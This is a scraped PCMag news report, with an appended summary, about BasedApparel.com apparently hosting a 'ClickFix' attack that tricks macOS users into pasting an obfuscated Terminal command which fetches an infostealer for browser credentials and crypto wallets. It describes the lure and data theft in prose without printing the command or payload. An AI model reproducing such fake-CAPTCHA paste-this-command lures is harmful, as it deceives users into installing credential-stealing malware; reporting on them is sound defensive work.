FBI director's Based Apparel site has been spotted hosting a 'ClickFix' attack
Recorded: May 23, 2026, 12:57 a.m.
| Original | Summarized |
Kash Patel's Apparel Site Is Trying To Trick Visitors Into Installing Malware | PCMag
Skip to Main Content Menu Maggie: AI Product Finder #MemorialDayTechDeals Best Products The Best Laptops for 2025 The Best PCs (Desktop Computers) for 2025 The Best Tablets for 2025 The Best Phones for 2025 The Best Wi-Fi Routers for 2025 The Best External Hard Drives for 2025 The Best All-in-One Printers for 2025 The Best TVs for 2025 The Best Headphones for 2025 The Best Robot Vacuums for 2025 The Best VPN Services for 2025 The Best Antivirus Software for 2025 The Best Password Managers for 2025 The Best Web Hosting Services for 2025 The Best Video Editing Software for 2025 The Best Graphics Cards for 2025 The Best Gaming Laptops for 2025 The Best Printers for 2025 The Best Monitors for 2025 See All Best Products Comparisons Reviews How-To News Opinions Deals PCs & Hardware Laptops Desktop Computers Tablets Monitors Hard Drives SSDs Network Attached Storage Wi-Fi Routers Wi-Fi Range Extenders Wi-Fi Mesh Networking Systems Printers 3D Printers Scanners Webcams Computer Mice Keyboards Graphics Cards Processors Motherboards PC Cases Mobile Mobile Phones Wireless Carriers Modems & Hotspots Bluetooth Headsets Mobile Phone Accessories Mobile Apps Android Apps iPhone Apps iPad Apps Electronics TVs Projectors Media Streaming Devices Headphones Speakers Ebook Readers Cameras Lenses Drones VR Electric & Hybrid Cars Car Accessories Smart Home Smart Home Home Security Home Security Cameras Robot Vacuums Smart Displays Smart Lighting Smart Locks Smart Plugs Smart Thermostats Smart Lawn Mowers Appliances Connected Kitchen Health & Fitness Health & Fitness Wearables Fitness Trackers Heart Rate Monitors Smart Scales Medical Alert Systems Gaming Gaming Hardware Gaming Systems Gaming Controllers & Accessories Games PC Games Microsoft Xbox Games Nintendo Games Sony Playstation Games Mobile Games Game Streaming Services Software & Services Artificial Intelligence (AI) Operating Systems Productivity System Utilities Photo & Design Education Website & App Building Tools Communications Personal Finance Accounting E-Commerce & Payments Human Resources IT Management Sales & Marketing Streaming Video Streaming Music Dating Apps DNA Testing Kits Meal Kits Security Security Security Suites Antivirus VPN Password Managers Parental Control Malware Removal Ransomware Protection Events Amazon Prime Big Deal Days Apple WWDC Black Friday Black Hat CES Comic Con Computex Cyber Monday E3 Google I/O IFA Microsoft Build Mobile World Congress (MWC) RSAC SXSW Samsung Unpacked Summer of Gaming Series 5G Accessibility Technology Advertising Content All About AI Amplify Android Apple Back to School Tech Best Internet Service Providers (ISPs) Business Choice Connected Traveler Fast Forward Fastest Mobile Networks Forward Thinking Get Organized Holiday Gift Guide How to Work From Home IT Watch In Depth Moms, Dads & Grads Gift Guide NextCar PCMag Picks PCMag Turns 40! Readers' Choice Refresh Your Tech Retro Computing Rigged Up Robotics Safety Net Science & Space SecurityWatch TechX Awards The Best of the Year The Pop-Off The Why Axis Try AI Weekend Project Windows 11 Newsletters #MemorialDayTechDeals Maggie: AI Product Finder
PCMag editors select and review products Home
News
Security Kash Patel's Apparel Site Is Trying To Trick Visitors Into Installing Malware The FBI director's Based Apparel site has been spotted hosting a 'ClickFix' attack, which involves duping users into running a seemingly benign, but malicious command. Michael Kan Principal Reporter OUR EXPERT
When he's not battling bugs and robots in Helldivers 2, Michael is reporting on AI, satellites, cybersecurity, PCs, and tech policy. May 21, 2026 Social Share
Add as a preferred source on Google An apparel site from FBI director Kash Patel has been spotted trying to trick macOS users into installing malware. The site, BasedApparel.com, is part of a merchandise brand that Patel co-created with Andrew Ollis prior to becoming FBI director under the Trump administration. On Thursday, a user based in Portugal spotted the online shop hosting a “ClickFix”-style attack that tries to dupe unsuspecting users into running a malicious command on their Mac computers. The attack seems to work as the user visits BasedApparel.com; a victim will encounter the site showing a page pretending to come from Cloudflare, which powers “Verify you are human” CAPTCHA tests and offers DDoS protection. You May Also Like The fake Cloudflare page will show a warning saying “Unusual Web Traffic Detected,” while also requiring the user to verify that they’re human. But to do so, the page posts some unusual instructions that call for the user to open Terminal, a built-in utility in macOS that can execute programs. (PCMag) The user is then told to click the “Copy" button on the page to copy the command “I am not a robot: Cloudflare Verification ID: 801470." But in reality, clicking the button will actually copy a much longer obfuscated text that looks like gibberish, although it's actually a hidden command. The actual copied command when you click the copy button. (PCMag) The user is then told to paste and run the command in Terminal, thus executing the instructions without realizing the danger. The hidden command will decode, and fetch a shell script containing a list of commands from the hacker-controlled web domain. PCMag encountered the attack while navigating BasedApparel.com on a MacBook, although we were only able to trigger the fake Cloudflare page once over the Chrome browser. This Tweet is currently unavailable. It might be loading or has been removed. The user on X who flagged the threat, “debbie," told PCMag she encountered the attack after reading an article in The Atlantic about Patel that linked to the Based Apparel site. “The ClickFix attack just kinda popped up when I was browsing it,” Debbie said in an email. “I took a quick look and it's just a classic infostealer, wrapped twice in base64 (binary-to-text encoding). It's interesting that it's written in Applescript though.” debbie, who described herself as a “big nerd,” managed to retrieve the malicious shell script payload, which we ran through VirusTotal. The payload was flagged by 27 antivirus engines as malicious, classifying it as Trojan and infostealer. The attack seems to work by spanning various instructions that if run through macOS’s Terminal utility could steal stored credentials from Chromium-based browsers along with data from cryptocurrency wallets, placing them into a zip archive then sent to a hacker-controlled domain. The attack suggests a hacker compromised some portion of BasedApparel.com when the ClickFix threat has remained pervasive in recent years, fooling less tech-savvy users. Security researchers have warned that the hackers behind ClickFix schemes have been circulating their attacks by stealing the login credentials for legitimate websites, tampering with exposed admin panels, or hitting vulnerable plugins. Based Apparel didn’t immediately respond to a request for comment. But the attack is a reminder to be vigilant around pop-ups and other scareware tactics. Apple recently introduced a safeguard in macOS Tahoe 26.4 that can stop and warn users against running copied-and-pasted commands into the Terminal utility, citing the potential of malware. About Our Expert Michael Kan
Experience I've been a journalist for over 15 years. I got my start as a schools and cities reporter in Kansas City and joined PCMag in 2017, where I cover satellite internet services, cybersecurity, PC hardware, and more. I'm currently based in San Francisco, but previously spent over five years in China, covering the country's technology sector.Since 2020, I've covered the launch and explosive growth of SpaceX's Starlink satellite internet service, writing 600+ stories on availability and feature launches, but also the regulatory battles over the expansion of satellite constellations, fights with rival providers like AST SpaceMobile and Amazon, and the effort to expand into satellite-based mobile service. I've combed through FCC filings for the latest news and driven to remote corners of California to test Starlink's cellular service. I also cover cyber threats, from ransomware gangs to the emergence of AI-based malware. In 2024 and 2025, the FTC forced Avast to pay consumers $16.5 million for secretly harvesting and selling their personal information to third-party clients, as revealed in my joint investigation with Motherboard.I also cover the PC graphics card market. Pandemic-era shortages led me to camp out in front of a Best Buy to get an RTX 3000. I'm now following how the AI-driven memory shortage is impacting the entire consumer electronics market. I'm always eager to learn more, so please jump in the comments with feedback and send me tips. Areas of Expertise Networking Security Graphics Cards Processors AI SpaceX Nvidia AMD Latest By Michael Kan Firmware Hints at New Starlink Dish With Built-In Battery, USB-C Port AT&T Sues to Get Out of California's Copper Landline Requirement Starlink Mobile Will Target Cities, But SpaceX's IPO Hype Clouds the Picture SpaceX IPO Filing Offers First Glimpse at Starlink Subscriber Numbers, Financials FCC Official Warns Against Giving Starlink Too Much Control Over Rural Broadband More from Michael Kan Read Full Bio Advertisement Google I/O
5 New Android 17 Features That Would Make My Phone Feel Better Instantly By Google's Gemini Omni Tries to Fill the Void Left by OpenAI's Sora By The Android 17 Beta Is Here. What It Includes and Which Phones Can Test It By What Is Universal Cart? Here's How Google's AI Agents Plan to Help You Shop By Is Spark Another Rebrand of Google Gemini or Something Else? By In Android 17, 'Gemini Intelligence' Can Automate Tasks Across Apps By I Tried Google's Screen-Free Smart Glasses, and They're Exactly What I Want By All Google I/O Further Reading
This Week in Hacks: ShinyHunters Hit 7-Eleven, Trump Mobile Exposes Data, and Scammers Target World Cup Fans By Time to Switch: How to Set Up Passkeys Before Microsoft Ditches SMS 2FA Logins By 'Revenge Porn' Law Goes Into Effect. Here's How to Request Image Removals By New Flipper One Multi-Tool Computer Is Built for Tinkerers By Your Private Discord Voice and Video Chats Are Now End-to-End Encrypted By Trump Mobile Site Reportedly Exposing Customers' Private Data By Hackers Infiltrate GitHub by Compromising Employee Device By ShinyHunters Goes After Cybersecurity Firm Warning Victims Not to Pay Ransoms By PCMag Follow PCMag
Honest, Objective, Lab-Tested Reviews PCMag.com is a leading authority on technology, delivering lab-based, independent reviews of the Editorial Principles
How We Test
44 65 43K+ 3D Printers Car Phone Mounts Graphics Cards Robot Vacuums VPN Services Apple MacBook Neo Review Incogni Review NordVPN Review Samsung Galaxy Watch 7 Review Apple AirPods Pro 3 vs. Pro 2 FreshBooks vs. QuickBooks Nest vs. Ring Samsung Galaxy S26 vs. Apple iPhone 17 SSD vs. Hard Drive How Do AirTags Work? How to Unblock Netflix With a VPN What Is Agentic AI? What Is Microsoft Copilot? What Is Wi-Fi 7? Acer Dell Lenovo NordVPN SpaceX All About AI Holiday Gift Guide Amazon Prime Day Cyber Monday Reviews About PCMag Careers Contact Us Press Center Ziff Davis Logo
CNET Logo
ZDNET Logo
Mashable Logo Lifehacker Logo
ExtremeTech Logo IGN Logo Speedtest Logo © 1996-2026 Ziff Davis, LLC., a Ziff Davis company. About Ziff Davis Advertise AdChoices TRUSTe Logo Hello!
Here are some examples of the types of questions you can ask: What's the best graphics card for 4K gaming? I'm in Beta. Help me get Keep |
An apparel website associated with FBI director Kash Patel, specifically BasedApparel.com, was discovered to be engaged in a method designed to trick macOS users into installing malware through a form of "ClickFix" attack. This scheme involved hosting a deceptive webpage mimicking Cloudflare security measures, which was intended to spoof human verification CAPTCHA tests and offer DDoS protection. Upon visiting the site, victims would be shown a warning regarding "Unusual Web Traffic Detected" and prompted to verify their humanity. To proceed, the page provided instructions directing the user to open the Terminal utility, a built-in macOS application capable of executing programs. The deception unfolded when the user was instructed to copy a specific string, ostensibly the "Cloudflare Verification ID," and paste it into the terminal. However, the button intended for copying contained a mechanism that copied a much longer, obfuscated text string, which was actually a hidden command. Following this, the user was directed to execute this hidden command in Terminal. This action caused the system to decode the string, revealing a shell script payload sourced from a hacker-controlled domain. This malicious script was designed to function as an infostealer, employing base64 encoding (binary-to-text encoding) and written in Applescript. The attack leverages the Terminal utility to execute a series of instructions that facilitate data exfiltration. The malicious shell script was capable of stealing stored credentials from Chromium-based browsers as well as sensitive data from cryptocurrency wallets, archiving this information into a zip file before transmitting it to the hacker's domain. The article suggests that such attacks are often executed by compromising legitimate websites through the theft of login credentials, tampering with exposed administrative panels, or exploiting vulnerable plugins. In response to this threat, Apple has implemented a safeguard in macOS Tahoe 26.4 to warn users against running copied-and-pasted commands in the Terminal utility, citing the potential risk of malware execution. |